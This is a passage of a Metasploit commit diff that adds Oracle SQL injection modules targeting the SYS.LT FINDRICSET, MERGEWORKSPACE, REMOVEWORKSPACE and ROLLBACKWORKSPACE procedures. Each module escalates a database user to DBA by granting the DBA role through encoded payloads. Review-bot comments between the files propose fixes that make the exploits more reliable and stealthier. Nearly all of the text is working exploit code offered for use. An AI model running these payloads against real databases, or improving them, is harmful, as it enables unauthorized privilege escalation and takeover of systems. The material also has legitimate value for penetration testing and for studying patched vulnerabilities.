=> e + return + end + 
prepare_exec(package1) + prepare_exec(package2) + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb new file mode 100644 index 0000000000..0d4e3400c9 --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_findricset_cursor.rb 
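Review bot: The procedure actually invoked in `package2` is `SYS.LT.COMPRESSWORKSPACETREE`, while the module name, description, file name and the status message all say `COMPRESSWORKSPACE`; one of the two is wrong, and the metadata should name the procedure the module really calls. `cruft = Rex::Text.rand_text_alpha_upper(1)` also gives the helper function a single-letter name, so `CREATE OR REPLACE FUNCTION #{cruft}` can silently overwrite an existing one-letter function in the target schema and `DROP FUNCTION #{cruft}` then deletes it; using the same `rand(10) + 1` length as `name` avoids clobbering existing objects (the same one-character name is used in the lt_mergeworkspace.rb and lt_removeworkspace.rb hunks). The option description `'SQL to execte.'` is misspelled here and in those same two hunks; it should read `'SQL to execute.'`.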
@@ -0,0 +1,62 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.FINDRICSET Evil Cursor Method', + 'Description' => %q{ + This module will escalate a Oracle DB user to DBA by exploiting + an sql injection bug in the SYS.LT.FINDRICSET package via Evil + Cursor technique. Tested on oracle 10.1.0.3.0 -- should work on + thru 10.1.0.5.0 and supposedly on 11g. Fixed with Oracle Critical + Patch update October 2007. + }, + 'Author' => ['CG'], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'BID', '26098' ], + [ 'CVE', '2007-5511'], + [ 'URL', 'http://rawlab.mindcreations.com/codes/exp/oracle/sys-lt-findricsetV2.sql'], + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2007.html'], + ], + 'DisclosureDate' => 'Oct 17 2007')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + p = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + + cursor = " + DECLARE + #{p} NUMBER; + BEGIN + #{p} := DBMS_SQL.OPEN_CURSOR; + DBMS_SQL.PARSE(#{p},'declare pragma autonomous_transaction; begin execute immediate ''#{datastore['SQL'].upcase}'';commit;end;',0); + SYS.LT.FINDRICSET('.''||dbms_sql.execute('||#{p}||')||'''')--',''); + END;" + + begin + print_status("Sending Evil Cursor and SQLI...") + prepare_exec(cursor) + rescue => e + return + end + end + +end 
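Review bot: `datastore['SQL'].upcase` rewrites the operator's whole statement, so any case-sensitive quoted identifier or string literal inside the supplied SQL is altered before it reaches `DBMS_SQL.PARSE`; none of the other modules in this commit upcase the statement, and unquoted Oracle identifiers are case-insensitive anyway, so the `.upcase` can simply be dropped. Because the option is registered as optional, an unset `SQL` makes `.upcase` raise `NoMethodError` while `cursor` is being built, which is outside the `begin`/`rescue` and so propagates uncaught. Inside the block, `rescue => e` returns without reporting `e`; `print_error("Request failed: #{e}")` before the `return` would make the failure visible.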
diff --git a/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
new file mode 100644
index 0000000000..e310efc34f
--- /dev/null
+++ b/modules/auxiliary/sqli/oracle/lt_mergeworkspace.rb
@@ -0,0 +1,104 @@ +## +# This file is part of the Metasploit Framework and may be subject to +# redistribution and commercial restrictions. Please see the Metasploit +# Framework web site for more information on licensing and terms of use. +# http://metasploit.com/projects/Framework/ +## + +require 'msf/core' + +class Metasploit3 < Msf::Auxiliary + + include Msf::Exploit::ORACLE + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'SQL Injection via SYS.LT.MERGEWORKSPACE.', + 'Description' => %q{ + This module exploits an sql injection flaw in the MERGEWORKSPACE + procedure of the PL/SQL package SYS.LT. Any user with execute + privilege on the vulnerable package can exploit this vulnerability. + }, + 'Author' => [ 'CG' ], + 'License' => MSF_LICENSE, + 'Version' => '$Revision:$', + 'References' => + [ + [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuoct2008.html' ], + [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ], + [ 'URL', 'http://www.dsecrg.com/pages/expl/show.php?id=23' ] + + ], + 'DisclosureDate' => 'Oct 22 2008')) + + register_options( + [ + OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]), + ], self.class) + end + + def run + name = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1) + cruft = Rex::Text.rand_text_alpha_upper(1) + + function = " + CREATE OR REPLACE FUNCTION #{cruft} + RETURN VARCHAR2 AUTHID CURRENT_USER + AS + PRAGMA AUTONOMOUS_TRANSACTION; + BEGIN + EXECUTE IMMEDIATE '#{datastore['SQL']}'; + COMMIT; + RETURN '#{cruft}'; + END;" + + package1 = %Q| + BEGIN + SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); + END; + | + + package2 = %Q| + BEGIN + SYS.LT.MERGEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}'); 
+ END; + | + + uno = Rex::Text.encode_base64(function) + dos = Rex::Text.encode_base64(package1) + tres = Rex::Text.encode_base64(package2) + + sql = %Q| + DECLARE + #{rand1} VARCHAR2(32767); + #{rand2} VARCHAR2(32767); + #{rand3} VARCHAR2(32767); + BEGIN + #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}'))); + EXECUTE IMMEDIATE #{rand1}; + #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}'))); + EXECUTE IMMEDIATE #{rand2}; + #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}'))); + EXECUTE IMMEDIATE #{rand3}; + END; + | + + clean = "DROP FUNCTION #{cruft}" + + # Try first, if it's good.. keep doing the dance. + print_status("Attempting sql injection on SYS.LT.MERGEWORKSPACE...") + begin + prepare_exec(sql) + rescue => e + return + end + + print_status("Removing function '#{cruft}'...") + prepare_exec(clean) + + end + +end diff --git a/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb new file mode 100644 index 0000000000..4e6646fa2d --- /dev/null +++ b/modules/auxiliary/sqli/oracle/lt_removeworkspace.rb 
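Review bot: The replacement drops the `[ 'CVE', '2008-3983' ]` reference that the deleted modules/auxiliary/admin/oracle/lt_mergeworkspace.rb carried for this same SYS.LT.MERGEWORKSPACE issue; the new `'References'` list should keep it alongside the advisory URLs. `SYS.LT.CREATEWORKSPACE` is also called in `package1` but nothing removes that workspace afterwards, and `prepare_exec(clean)` only runs when the whole injected block succeeds, so a failure midway leaves both the workspace and the function `#{cruft}` on the server. Running the DROP in an `ensure` once the function exists, and removing the created workspace in the same cleanup step, would leave the target as it was found.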
@@ -0,0 +1,103 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::ORACLE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SQL Injection via SYS.LT.REMOVEWORKSPACE.',
+ 'Description' => %q{
+ This module exploits an sql injection flaw in the REMOVEWORKSPACE
+ procedure of the PL/SQL package SYS.LT. Any user with execute
+ privilege on the vulnerable package can exploit this vulnerability.
+ },
+ 'Author' => [ 'Sh2kerr ' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'CVE', '2008-3984' ],
+ [ 'URL', 'http://www.appsecinc.com/resources/alerts/oracle/2008-10.shtml' ],
+
+ ],
+ 'DisclosureDate' => 'Jan 2009'))
+
+ register_options(
+ [
+ OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),
+ ], self.class)
+ end
+
+ def run
+ name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ cruft = Rex::Text.rand_text_alpha_upper(1)
+
+ function = "
+ CREATE OR REPLACE FUNCTION #{cruft}
+ RETURN VARCHAR2 AUTHID CURRENT_USER
+ AS
+ PRAGMA AUTONOMOUS_TRANSACTION;
+ BEGIN
+ EXECUTE IMMEDIATE '#{datastore['SQL']}';
+ COMMIT;
+ RETURN '#{cruft}';
+ END;"
+
+ package1 = %Q|
+ BEGIN
+ SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
+ END;
+ |
+
+ package2 = %Q|
+ BEGIN
+ SYS.LT.REMOVEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
+ END;
+ |
+
+ uno = Rex::Text.encode_base64(function)
+ dos = Rex::Text.encode_base64(package1)
+ tres = Rex::Text.encode_base64(package2)
+
+ sql = %Q|
+ DECLARE
+ #{rand1} VARCHAR2(32767);
+ #{rand2} VARCHAR2(32767);
+ #{rand3} VARCHAR2(32767);
+ BEGIN
+ #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
+ EXECUTE IMMEDIATE #{rand1};
+ #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
+ EXECUTE IMMEDIATE #{rand2};
+ #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));
+ EXECUTE IMMEDIATE #{rand3};
+ END;
+ |
+
+ clean = "DROP FUNCTION #{cruft}"
+
+ # Try first, if it's good.. keep doing the dance.
+ print_status("Attempting sql injection on SYS.LT.REMOVEWORKSPACE...")
+ begin
+ prepare_exec(sql)
+ rescue => e
+ return
+ end
+
+ print_status("Removing function '#{cruft}'...")
+ prepare_exec(clean)
+
+ end
+
+end
diff --git a/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb
new file mode 100644
index 0000000000..72b29a40e9
--- /dev/null
+++ b/modules/auxiliary/sqli/oracle/lt_rollbackworkspace.rb
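Review bot: The default for the `SQL` option, `"GRANT DBA to #{datastore['DBUSER']}"`, is interpolated once inside `initialize`, so it freezes whatever `DBUSER` holds when the module is loaded rather than the value the operator sets afterwards; if the ORACLE mixin supplies a default account the grant silently targets that account, and if it supplies none the statement becomes `GRANT DBA to ` and fails to parse. Resolve it at run time instead: register the option with a `nil` default and in `run` use `stmt = datastore['SQL'] || "GRANT DBA to #{datastore['DBUSER']}"` in place of `datastore['SQL']` in the `function` string. The option description `'SQL to execte.'` is also misspelled; `'SQL to execute.'`. The same default and typo appear in the SYS.LT.MERGEWORKSPACE module and the lt_rollbackworkspace.rb hunk of this commit.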
@@ -0,0 +1,100 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::ORACLE
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'SQL Injection via SYS.LT.ROLLBACKWORKSPACE.',
+ 'Description' => %q{
+ This module exploits an sql injection flaw in the ROLLBACKWORKSPACE
+ procedure of the PL/SQL package SYS.LT. Any user with execute
+ privilege on the vulnerable package can exploit this vulnerability.
+ },
+ 'Author' => [ 'MC' ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision:$',
+ 'References' =>
+ [
+ [ 'CVE', '2009-0978' ],
+ [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2009.html' ],
+ ],
+ 'DisclosureDate' => 'May 4 2009'))
+
+ register_options(
+ [
+ OptString.new('SQL', [ false, 'SQL to execte.', "GRANT DBA to #{datastore['DBUSER']}"]),
+ ], self.class)
+ end
+
+ def run
+ name = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand1 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand2 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ rand3 = Rex::Text.rand_text_alpha_upper(rand(10) + 1)
+ cruft = Rex::Text.rand_text_alpha_upper(rand(5) + 1)
+
+ function = "
+ CREATE OR REPLACE FUNCTION #{cruft}
+ RETURN VARCHAR2 AUTHID CURRENT_USER
+ AS
+ PRAGMA AUTONOMOUS_TRANSACTION;
+ BEGIN
+ EXECUTE IMMEDIATE '#{datastore['SQL']}';
+ COMMIT;
+ RETURN '#{cruft}';
+ END;"
+
+ package1 = %Q|
+ BEGIN
+ SYS.LT.CREATEWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
+ END;
+ |
+
+ package2 = %Q|
+ BEGIN
+ SYS.LT.ROLLBACKWORKSPACE('#{name}'' and #{datastore['DBUSER']}.#{cruft}()=''#{cruft}');
+ END;
+ |
+
+ uno = Rex::Text.encode_base64(function)
+ dos = Rex::Text.encode_base64(package1)
+ tres = Rex::Text.encode_base64(package2)
+
+ sql = %Q|
+ DECLARE
+ #{rand1} VARCHAR2(32767);
+ #{rand2} VARCHAR2(32767);
+ #{rand3} VARCHAR2(32767);
+ BEGIN
+ #{rand1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));
+ EXECUTE IMMEDIATE #{rand1};
+ #{rand2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));
+ EXECUTE IMMEDIATE #{rand2};
+ #{rand3} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{tres}')));
+ EXECUTE IMMEDIATE #{rand3};
+ END;
+ |
+
+ clean = "DROP FUNCTION #{cruft}"
+
+ print_status("Attempting sql injection on SYS.LT.ROLLBACKWORKSPACE...")
+ begin
+ prepare_exec(sql)
+ rescue => e
+ return
+ end
+
+ print_status("Removing function '#{cruft}'...")
+ prepare_exec(clean)
+ end
+
+end
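Review bot: The helper function name `cruft` is drawn from `rand_text_alpha_upper(rand(5) + 1)` here but from `rand_text_alpha_upper(1)` in the SYS.LT.MERGEWORKSPACE module and the lt_removeworkspace.rb hunk, where a single upper-case letter leaves only 26 possible names; `CREATE OR REPLACE FUNCTION` will then silently overwrite an existing function of that name in the `DBUSER` schema, and the later `DROP FUNCTION #{cruft}` deletes it outright. Short random identifiers can also land on a PL/SQL reserved word (`IF`, `AS`, `END`), which applies to `rand1`..`rand3` as well and would make the anonymous block fail to compile intermittently. Use one longer length in all three modules, e.g. `cruft = Rex::Text.rand_text_alpha_upper(rand(4) + 6)`, and document the intent above it: `# random helper name; long enough to avoid clobbering an existing object or hitting a keyword`.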